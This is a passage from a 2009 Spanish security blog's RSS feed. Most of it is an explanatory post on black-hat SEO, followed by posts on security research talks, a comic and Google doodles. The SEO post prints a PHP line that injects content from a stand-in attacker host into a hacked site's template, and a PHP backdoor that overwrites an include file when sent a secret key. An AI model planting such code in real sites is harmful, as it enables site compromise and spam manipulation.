los enlaces dinámicamente. Con ese objetivo los Black SEO tratan de modificar directamente las plantillas de documentos mediante la inclusión de un fichero contralado. En ese fichero controlado se pueden ir cambiando directamente los links, lo que permitirá al Black SEO decidir que sube y que baja, simplemente, cambiando el contenido de un fichero de texto.&lt;br /&gt;&lt;br /&gt;Para ello se buscan webs vulnerables que permitan modificar los ficheros. Las técnicas de RFI o la explotación de vulnerabilidades que permitan ejecutar comandos son las más apetecibles para estos ataques. Una vez obtenido este privilegio, sería suficiente con añadir una línea como la siguiente en la plantilla de la víctima.&lt;br /&gt;&lt;br /&gt;&lt;em&gt;[?=@file_get_contents("http://web_controlada_por_los_malos/1.txt");?]&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;En la imagen siguiente se puede ver uno de estos ficheros listo para inyectarse en webs vulnerables. &lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SviD68cKETI/AAAAAAAAFf0/aYSC6PuWA2A/s1600-h/Figura19.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 313px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SviD68cKETI/AAAAAAAAFf0/aYSC6PuWA2A/s400/Figura19.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5402212801710788914" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 19: Fichero para incluir en sitios vulnerados&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Con realizar una búsqueda en Google o en Bing por alguno de esos links que aparecen ene este fichero es fácil descubrir cuáles han sido los sitios vulnerados.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SviD6yARGBI/AAAAAAAAFfs/sYtHEzrodn0/s1600-h/Figura20.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 267px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SviD6yARGBI/AAAAAAAAFfs/sYtHEzrodn0/s400/Figura20.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5402212798909454354" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 20: Instituto de Desarrollo Regional de la Universidad de Castilla La Mancha&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Guerra de Bandas&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Una vez que se tiene controlado un sitio web del que se está obteniendo tráfico y pagerank es conveniente defenderlo contra otros Black SEO de moral más relajada aun. Así es curioso descubrir como en ciertos sitios se coloniza con un fichero que le permite al atacante subir sus cambios y la vulnerabilidad utilizada se cierra frente a otros posibles atacantes.&lt;br /&gt;&lt;br /&gt;Éste es un ejemplo de un código utilizado para sobre-escribir el fichero de inclusión de un sitio web en el que se usa un LFI, y como éste es protegido por un clave que se envía por post y se co en MD5.&lt;br /&gt;&lt;br /&gt;&lt;em&gt;[?php &lt;br /&gt;$secret_key = 'sd;gij32498gjwevgfdsgvluergbw3489'; &lt;br /&gt;$file_to_post = 'inc.php'; &lt;br /&gt;if (isset($_POST['data']) &amp;&amp; isset($_POST['secret'])) { &lt;br /&gt;   if (md5($secret_key) == $_POST['secret']) { &lt;br /&gt;       $hFile = fopen($file_to_post, 'w'); &lt;br /&gt;       if (!$hFile) { die('error opening file'); } &lt;br /&gt; if (FALSE !== fwrite($hFile, stripslashes($_POST['data']))) &lt;br /&gt;{ echo 'OK'; fclose($hFile); }  else { echo '### 404 ###'; } &lt;br /&gt;} else { echo "### 404 ###";  } &lt;br /&gt;} else { echo "### 404 ###"; } &lt;br /&gt;?]&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;**********************************************************************************************&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/seo-para-gente-de-moral-relajada-i-de.html"&gt;Técnicas SEO para gente de moral relajada [I de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [II de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [III de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral_09.html"&gt;Técnicas SEO para gente de moral relajada [IV de VI]&lt;/a&gt;&lt;br /&gt;- Técnicas SEO para gente de moral relajada [V de VI]&lt;br /&gt;- Técnicas SEO para gente de moral relajada [VI de VI]&lt;br /&gt;&lt;em&gt;Autores: Chema Alonso &amp; Enrique Rando&lt;/em&gt;&lt;br /&gt;**********************************************************************************************&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-4024180387148127546?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/6s_XUjm0Me4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/6s_XUjm0Me4/tecnicas-seo-para-gente-de-moral_09.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SviEDBb1ecI/AAAAAAAAFgU/R8dlJvYwGm4/s72-c/Figura15.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral_09.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-4683653920696643717</guid><pubDate>Mon, 09 Nov 2009 08:57:00 +0000</pubDate><atom:updated>2009-11-09T10:09:29.019+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">VPN</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Metadatos</category><category domain="http://www.blogger.com/atom/ns#">Seguridad Informática</category><title>Líneas de Investigación</title><description>&lt;div align="justify"&gt;No es la primera vez que me preguntan sobre qué puede realizar alguien para dedicarse a seguridad, qué debe leer, qué debe estudiar o qué debe practicar. La verdad es que la pregunta no es difícil, pero la respuesta sí que lo es. Dedicarle 25 horas al día suele ser lo más apropiado, estudia todo lo que caiga en tu mano y ya puede ser tu hobby esto de la seguridad informática para que un fin de semana te lo pases haciendo pruebas a cualquier cosa.&lt;br /&gt;&lt;br /&gt;Hoy os dejo tres presentaciones que me tienen un poco enganchado con algunas pruebas. Son tres presentaciones muy interesantes que, seguro, seguro, seguro, que si te dedicas a esto, o ya has oído hablar de ellas, o las has leído o estás probándolas. &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Unicode Transformations And Security Vulnerabilities&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Esta presentación está focalizada en el estudio de las implicaciones de seguridad en el uso de UNICODE en los navegadores hoy en día. Desde los visual spoofings mediante la simulación de URLs usando caracteres distintos en codificación UNICODE pero iguales en representación gráfica, hasta las más divertidas transformaciones de estos cuando su representación debe ser truncada a ASCII. La presentación está disponible en la siguiente URL: &lt;a href="http://www.casabasecurity.com/files/Chris_Weber_Character%20Transformations%20v1.7_IUC33.pdf"&gt;Unicode Transformations And Security Vulnerabilities&lt;/a&gt;. Hay un preview de un paper sobre Unicode Security publicado en la web de Blackhat, dónde el autor dio una charla anterior sobre este tema, que ayuda a comprender mejor la presentación: &lt;a href="http://www.blackhat.com/presentations/bh-usa-09/WEBER/BHUSA09-Weber-UnicodeSecurityPreview-PAPER.pdf"&gt;Preview of Paper about Unicode Security&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Entreprise Open Source Intelligence Gathering&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Esta presentación se hizo pública en Ohio, hace apenas una semana. Es una recopilación sobre fugas de datos en la empresa a través de twitts, posts en blogs, facebooks y por supuesto metadata. Me ha gustado mucho la recolección de ejemplos, y reconozco que se me ha escapado más de una sonrisilla con ellos.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;div style="width:425px;text-align:left" id="__ss_2385740"&gt;&lt;a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/agent0x0/enterprise-open-source-intelligence-gathering" title="Enterprise Open Source Intelligence Gathering"&gt;Enterprise Open Source Intelligence Gathering&lt;/a&gt;&lt;object style="margin:0px" width="425" height="355"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=enterpriseosig-091030124257-phpapp01&amp;stripped_title=enterprise-open-source-intelligence-gathering" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=enterpriseosig-091030124257-phpapp01&amp;stripped_title=enterprise-open-source-intelligence-gathering" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;"&gt;View more &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/"&gt;presentations&lt;/a&gt; from &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/agent0x0"&gt;agent0x0&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;/center&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Renegotiating TLS&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Ésta es la presentación que más polémica está levantando en los últimos momentos. Este trabajo muestra cómo es posible, a través de un fallo en la implementación de la renegociación TLS, de inyectar datos en claro entre el cliente y el servidor en una conexión cifrada y autenticada con TLS. &lt;a href="http://www.hispasec.com/unaaldia/4030"&gt;La polémica que está levantando la ha recogido, con su estilo pulcro y acertado, nuestro amigo &lt;em&gt;“Pajarraco”&lt;/em&gt; de los Santos en Una-al-día&lt;/a&gt;, pero merece la pena leerse &lt;a href="http://extendedsubset.com/Renegotiating_TLS.pdf"&gt;el documento publicado&lt;/a&gt; y analizar &lt;a href="http://extendedsubset.com/Renegotiating_TLS_pd.pdf"&gt;los gráficos para comprender mejor el fallo&lt;/a&gt;. Para hacerlo mucho más llevadero, además, se han publicado&lt;a href="http://extendedsubset.com/renegotiating_tls_20091104_pub.zip"&gt; tramas de red de ejemplo&lt;/a&gt;. Todos en la Web de la publicación: &lt;a href="http://extendedsubset.com/"&gt;Renegotiating TLS&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Tres temas curiosos, que seguro que te aportan nuevas ideas para hacer nuevas cosas. Así funciona esto.&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-4683653920696643717?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/r4uVMhBwrEA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/r4uVMhBwrEA/lineas-de-investigacion.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/lineas-de-investigacion.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-2001840948248366635</guid><pubDate>Sat, 07 Nov 2009 23:05:00 +0000</pubDate><atom:updated>2009-11-10T13:34:38.840+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Comics</category><category domain="http://www.blogger.com/atom/ns#">Facebook</category><category domain="http://www.blogger.com/atom/ns#">No Lusers</category><category domain="http://www.blogger.com/atom/ns#">Humor</category><title>No Lusers 78: Feisbuk Fans</title><description>&lt;div align="justify"&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvX9s7KiN4I/AAAAAAAAFfc/0jvf23n9jNc/s1600-h/1.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 320px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvX9s7KiN4I/AAAAAAAAFfc/0jvf23n9jNc/s400/1.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5401502276338726786" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvX-JbDwovI/AAAAAAAAFfk/rFJZbWFMFOQ/s1600-h/2.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 320px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvX-JbDwovI/AAAAAAAAFfk/rFJZbWFMFOQ/s400/2.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5401502765936583410" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvX9sRKeUsI/AAAAAAAAFfM/43OlYbcdhsI/s1600-h/3.PNG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 320px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvX9sRKeUsI/AAAAAAAAFfM/43OlYbcdhsI/s400/3.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5401502265064182466" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-2001840948248366635?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/diCfERjVuTo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/diCfERjVuTo/no-lusers-78-fesibuk-fans.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvX9s7KiN4I/AAAAAAAAFfc/0jvf23n9jNc/s72-c/1.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/no-lusers-78-fesibuk-fans.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-7226661381415087289</guid><pubDate>Fri, 06 Nov 2009 23:01:00 +0000</pubDate><atom:updated>2009-11-07T00:01:01.398+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Curiosidades</category><category domain="http://www.blogger.com/atom/ns#">Comics</category><category domain="http://www.blogger.com/atom/ns#">Google</category><title>Mi lado Googly</title><description>&lt;div align="justify"&gt;Apovechando que es puente voy a cambiar el tercio y hablaros de alguna chorrada mía. De Google hay cosas que me gustan y cosas que no, pero si he de decir alguna de las que sí que me gustan, elijo a sus diseñadores gráficos y, en especial, a los que controlan y preparan los logitos del buscador. Periódica, y a veces sólo para algunos paises, Google va cambiando el logo de su buscador para conmemorar los juegos Olímpicos, el aniversario de alguna personalidad o el día nacional de algún país.&lt;br /&gt;&lt;br /&gt;Han pasado por él personajes ilustres como Miguel Angel, Picasso o Michael Jackson, junto a otros personajes como Epi &amp; Blas o la Gallina Capotana. Es toda una cultura y un estilo de hacer diseño que podéis revisar en &lt;a href="http://www.google.com/logos/"&gt;la url de los logos de Google&lt;/a&gt;. Yo he seleccionado 20 que me han gustado mucho. ¿Cuál es el que más te gusta a ti?&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRJJNuK_mI/AAAAAAAAFfE/SCV5QaleM0I/s1600-h/summer2004_closing.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 276px; height: 139px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRJJNuK_mI/AAAAAAAAFfE/SCV5QaleM0I/s400/summer2004_closing.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401022275775037026" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Se acabaron los Juegos Olímpicos de Atenas&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRJIxpL-lI/AAAAAAAAFe8/0Mdvqzq6fhU/s1600-h/van_gogh.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 276px; height: 120px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRJIxpL-lI/AAAAAAAAFe8/0Mdvqzq6fhU/s400/van_gogh.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401022268237937234" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;El loco del pelo rojo&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvRJIsHH04I/AAAAAAAAFe0/ko4F4Mzsotk/s1600-h/warhol.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 261px; height: 101px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvRJIsHH04I/AAAAAAAAFe0/ko4F4Mzsotk/s400/warhol.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401022266752881538" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Andy Warhol&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvRJImzL5XI/AAAAAAAAFes/wfulqHoQDc8/s1600-h/lego08.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 276px; height: 110px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvRJImzL5XI/AAAAAAAAFes/wfulqHoQDc8/s400/lego08.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401022265327084914" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Google Lego&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/SvRJIf66osI/AAAAAAAAFek/mNbZTrPtwG8/s1600-h/braille.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 330px; height: 110px;" src="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/SvRJIf66osI/AAAAAAAAFek/mNbZTrPtwG8/s400/braille.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401022263480459970" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Google Braille&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIxfaWkWI/AAAAAAAAFec/x5YbYAnVtos/s1600-h/michelangelo.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 125px;" src="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIxfaWkWI/AAAAAAAAFec/x5YbYAnVtos/s400/michelangelo.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021868206887266" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Miguel Ángel&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIxQ3IuzI/AAAAAAAAFeU/MoUWOTqoDuw/s1600-h/picasso.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 285px; height: 110px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIxQ3IuzI/AAAAAAAAFeU/MoUWOTqoDuw/s400/picasso.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021864301083442" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Pablo Picasso&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIxAimTPI/AAAAAAAAFeM/Kq6v0QyRXiQ/s1600-h/lhc.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 330px; height: 125px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIxAimTPI/AAAAAAAAFeM/Kq6v0QyRXiQ/s400/lhc.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021859919973618" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Large Hadron Collider&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIw1vTvRI/AAAAAAAAFeE/E6UYVsnYtVg/s1600-h/doraemon09.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 263px; height: 118px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIw1vTvRI/AAAAAAAAFeE/E6UYVsnYtVg/s400/doraemon09.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021857020493074" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Doraemon... ¿o es el de Cálico?&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIwo2oJNI/AAAAAAAAFd8/wqYniI90_fI/s1600-h/halloween03.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 321px; height: 141px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIwo2oJNI/AAAAAAAAFd8/wqYniI90_fI/s400/halloween03.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021853561529554" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Uno de los especiales de Halloween&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIkQh_NaI/AAAAAAAAFd0/vdiERrbRZYs/s1600-h/velasquez.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 330px; height: 136px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIkQh_NaI/AAAAAAAAFd0/vdiERrbRZYs/s400/velasquez.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021640874079650" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Velázquez&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIj6fnomI/AAAAAAAAFds/chgBroxMkBo/s1600-h/hitchcock.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 276px; height: 120px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIj6fnomI/AAAAAAAAFds/chgBroxMkBo/s400/hitchcock.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021634958565986" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Don Alfredo&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIjwj2baI/AAAAAAAAFdk/7sdB9WG3_-M/s1600-h/dilbert00.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 276px; height: 130px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIjwj2baI/AAAAAAAAFdk/7sdB9WG3_-M/s400/dilbert00.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021632291958178" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Dilbert &amp; Google. No te pierdas la serie&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIjlRCF_I/AAAAAAAAFdc/nVWIzWKIB6Y/s1600-h/cookie_monster-hp.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 303px; height: 122px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIjlRCF_I/AAAAAAAAFdc/nVWIzWKIB6Y/s400/cookie_monster-hp.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021629260240882" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Nuestro amigo Triki&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIjVNLNdI/AAAAAAAAFdU/iYEfaxX9d18/s1600-h/bigbird-hp.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 302px; height: 150px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvRIjVNLNdI/AAAAAAAAFdU/iYEfaxX9d18/s400/bigbird-hp.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021624949093842" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Las patas de Caponata&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRISz-LnsI/AAAAAAAAFdM/xVGpGvKaxgA/s1600-h/comic-con09.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 317px; height: 187px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRISz-LnsI/AAAAAAAAFdM/xVGpGvKaxgA/s400/comic-con09.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021341149929154" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Liga de la Justicia&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRISthUUuI/AAAAAAAAFdE/9_1pRem-VcE/s1600-h/castellers06.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 276px; height: 110px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRISthUUuI/AAAAAAAAFdE/9_1pRem-VcE/s400/castellers06.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021339418252002" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Castellers Catalans&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvRISnL-wOI/AAAAAAAAFc8/9irC8H-fYIo/s1600-h/bert_ernie-hp.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 265px; height: 116px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvRISnL-wOI/AAAAAAAAFc8/9irC8H-fYIo/s400/bert_ernie-hp.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021337718145250" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Epi &amp; Blas&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvRISRsr_vI/AAAAAAAAFc0/IP7ZA9nAa9A/s1600-h/astroboy.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 350px; height: 110px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SvRISRsr_vI/AAAAAAAAFc0/IP7ZA9nAa9A/s400/astroboy.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021331949747954" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Astro Boy&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRISC4mxVI/AAAAAAAAFcs/8Tmy1FB2CQY/s1600-h/asterix09.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 128px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRISC4mxVI/AAAAAAAAFcs/8Tmy1FB2CQY/s400/asterix09.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5401021327973205330" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Asteríx y Obelíx con el loco romano&lt;/em&gt;&lt;/CENTER&gt;&lt;br /&gt;Hay un &lt;a 